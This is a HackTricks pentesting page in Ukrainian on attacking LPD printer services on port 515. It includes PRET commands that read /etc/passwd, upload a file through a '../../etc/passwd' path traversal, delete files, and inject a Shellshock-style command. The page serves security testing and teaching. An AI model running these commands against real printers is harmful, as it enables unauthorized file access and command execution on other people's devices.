hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
2024-03-29 19:49:46 +01:00

5.5 KiB
Raw Blame History

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Вступ до протоколу LPD

У 1980-х роках був розроблений протокол Line Printer Daemon (LPD) в Berkeley Unix, який пізніше був узаконений через RFC1179. Цей протокол працює через порт 515/tcp, дозволяючи взаємодію через команду lpr. Суть друку через LPD полягає в надсиланні контрольного файлу (для вказання деталей завдання та користувача) разом з файлом даних (який містить інформацію для друку). Хоча контрольний файл дозволяє вибір різних форматів файлів для файлу даних, обробка цих файлів визначається конкретною реалізацією LPD. Широко визнаною реалізацією для систем, схожих на Unix, є LPRng. Зокрема, протокол LPD може бути використаний для виконання зловмисних друкувальних завдань PostScript або PJL.

Інструменти для взаємодії з принтерами LPD

PRET представляє два основні інструменти, lpdprint та lpdtest, які пропонують простий спосіб взаємодії з принтерами, сумісними з LPD. Ці інструменти дозволяють виконувати різноманітні дії від друку даних до маніпулювання файлами на принтері, такі як завантаження, вивантаження або видалення.

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Для осіб, які зацікавлені у подальшому дослідженні сфери взлому принтерів, вичерпний ресурс можна знайти тут: Hacking Printers.

Shodan

  • порт 515
Вивчайте взлом AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks: